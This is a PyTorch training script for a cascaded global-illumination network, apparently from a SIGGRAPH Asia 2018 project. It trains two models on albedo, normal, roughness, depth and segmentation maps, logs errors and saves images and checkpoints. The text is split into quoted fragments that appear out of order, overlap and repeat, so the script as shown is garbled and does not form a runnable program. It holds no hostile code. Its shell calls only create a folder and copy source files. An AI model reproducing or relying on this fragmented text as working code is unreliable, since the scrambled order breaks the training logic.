"utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch,",
") normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu )",
"1000 or j% 2000 == 0: # Save the ground truth and the",
"vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1 / torch.clamp(depthBatch,",
"opt.imageSize, opt.imageSize) ) # Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination() #########################################",
") depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize,",
"or j% 2000 == 0: # Save the ground truth and the input",
"j, n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j,",
"globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch) ) torch.save(globIllu2to3.state_dict(), '{0}/globIllu2to3_{1}.pth'.format(opt.experiment, epoch)",
"for training network') # The training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of",
"path to store samples and models') # The basic training setting parser.add_argument('--nepoch', type=int,",
"None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s' % opt.experiment )",
"0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n]",
"inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() )",
"3, opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch =",
"torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3",
"default=None, help='the path to store samples and models') # The basic training setting",
"opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) # Global illumination",
"j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch,",
"dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough']",
"np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)",
"opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle = False)",
") seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu )",
"Build the cascade network architecture # globalIllu2s = [] globalIllu3s = [] n",
"######################################################## globalIllu2Errs = [] globalIllu3Errs = [] pixelNum = torch.sum(segBatch ).cpu().data.item() for m",
"help='input batch size') parser.add_argument('--imageSize', type=int, default=256, help='the height / width of the input",
"imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade network architecture # globalIllu2s",
"trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :],",
"j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList =",
"= imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### ####################################",
"in range(0, n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] -",
"[] pixelNum = torch.sum(segBatch ).cpu().data.item() for m in range(0, n + 1): globalIllu2Errs.append(",
", '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment,",
"in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment,",
"numpy as np from torch.autograd import Variable import torch.optim as optim import argparse",
"0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the predicted results",
"# Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment,",
"globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum + g3W",
"1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) )",
"help='the height / width of the input image to network') parser.add_argument('--cuda', action='store_true', help='enables",
"segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2",
"%s' % opt.experiment ) g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed",
"#################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize,",
"dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1']",
"* globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error",
"(depthOut - 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( (",
"depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu",
") ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ###################### # Send things into GPU",
"seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu",
"#################################### #################################### # Global Optimier opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3",
"+ 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j)",
"( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the",
"+ 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the predicted results for",
"globalIllu2Errs = [] globalIllu3Errs = [] pixelNum = torch.sum(segBatch ).cpu().data.item() for m in",
"depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId)",
"3, opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch =",
"dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade network architecture",
") imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu )",
").data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment,",
"= globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimier opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(),",
"depthOut = (depthOut - 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) )",
"for m in range(0, n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) *",
"utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)",
"Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) #",
"network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how much level of cascades should we use')",
"default=[0], help='the gpus used for training network') # The training weight parser.add_argument('--globalIllu2', type=float,",
"= opt.batchSize, num_workers = 8, shuffle = False) j = 0 globalIllu1ErrsNpList= np.ones(",
"DataLoader parser = argparse.ArgumentParser() # The locationi of training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path",
") globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs = [] pixelNum = torch.sum(segBatch ).cpu().data.item()",
"import DataLoader parser = argparse.ArgumentParser() # The locationi of training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/',",
"opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j)",
"False) j = 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList =",
"to fine-tune the network or not') parser.add_argument('--epochId', type=int, default = -1, help='the training",
"dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg']",
"j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog,",
"imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)",
"range(0, n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] - imP2Batch)",
"models') # The basic training setting parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs",
"+ 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() # Update the training",
"opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(),",
"np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)",
"so you should probably run with --cuda\") #################################### # initalize tensors albedoBatch =",
"torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ########################################################",
"import utils import dataLoader from torch.utils.data import DataLoader parser = argparse.ArgumentParser() # The",
"else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j)",
"+ 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2)",
"the input image to network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0],",
"illumination globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) )",
"cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for training network') # The",
"opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize,",
"opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade network architecture # globalIllu2s = []",
"+ g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs,",
"+ 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n)",
"things into GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch =",
"= dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu =",
"betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset",
"imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu",
"the network or not') parser.add_argument('--epochId', type=int, default = -1, help='the training epoch of",
"1, opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch =",
"= DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle = False) j =",
"param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2",
"images') parser.add_argument('--experiment', default=None, help='the path to store samples and models') # The basic",
") imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) # Global illumination globIllu1to2 =",
"to store samples and models') # The basic training setting parser.add_argument('--nepoch', type=int, default=18,",
"albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu",
"network architecture # globalIllu2s = [] globalIllu3s = [] n = 0 inputGlob2",
"epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0),",
"shuffle = False) j = 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)",
"epoch), 'w') for i, dataBatch in enumerate(brdfLoader): j += 1 # Load data",
"imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)",
"vutils import utils import dataLoader from torch.utils.data import DataLoader parser = argparse.ArgumentParser() #",
"+ 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2)",
"in range(0, opt.cascadeLevel + 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data,",
"imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade",
"== 1 or j == 1000 or j% 2000 == 0: # Save",
"= (depthOut - 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image(",
"= 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList = np.ones( [1,",
"The training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination prediction 2')",
"globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2',",
"The basic training setting parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for training')",
"for i, dataBatch in enumerate(brdfLoader): j += 1 # Load data from cpu",
"type=int, default=18, help='the number of epochs for training') parser.add_argument('--batchSize', type=int, default=16, help='input batch",
"Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch",
"used for training network') # The training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight",
"*.py %s' % opt.experiment ) g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0]",
"to network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used",
"if torch.cuda.is_available() and not opt.cuda: print(\"WARNING: You have a CUDA device, so you",
"j) if j == 1 or j == 1000 or j% 2000 ==",
"Global Optimier opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4,",
"results for n in range(0, opt.cascadeLevel + 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] +",
"as np from torch.autograd import Variable import torch.optim as optim import argparse import",
"utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu',",
"utils import dataLoader from torch.utils.data import DataLoader parser = argparse.ArgumentParser() # The locationi",
"the network') # The detail network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how much level",
"Tune the network parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the network or",
"utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch,",
"training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination prediction 2') parser.add_argument('--globalIllu3',",
"globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimier opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) )",
"imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch)",
"): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch in enumerate(brdfLoader): j +=",
"imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3",
"#################################### # initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch =",
"opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1,",
"depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu",
"+ 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10)",
"/ width of the input image to network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds',",
"g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1, 10000) print(\"Random Seed:",
"+ 1) % 2 == 0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2",
"globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :],",
"= Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )",
"optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) #####################################",
"n = 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2",
"dtype = np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch),",
"* segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum =",
"DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle = False) j = 0",
"/ 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch)",
"/ pixelNum / 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr =",
"3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) )",
"10) * segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data,",
"1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) )",
"albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)",
"# Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2',",
") globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) /",
"= dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad()",
"is None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s' % opt.experiment",
"segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j)",
"setting parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for training') parser.add_argument('--batchSize', type=int, default=16,",
"to images') parser.add_argument('--experiment', default=None, help='the path to store samples and models') # The",
"globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimier opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4,",
"# Send things into GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId)",
"= torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3)",
"utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate(",
"1 or j == 1000 or j% 2000 == 0: # Save the",
"segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId)",
"parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for training') parser.add_argument('--batchSize', type=int, default=16, help='input",
"setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how much level of cascades should we use') opt",
") # Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune:",
"m in range(0, n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m]",
"opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda: print(\"WARNING: You have a CUDA",
":], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) if",
"help='path to images') parser.add_argument('--experiment', default=None, help='the path to store samples and models') #",
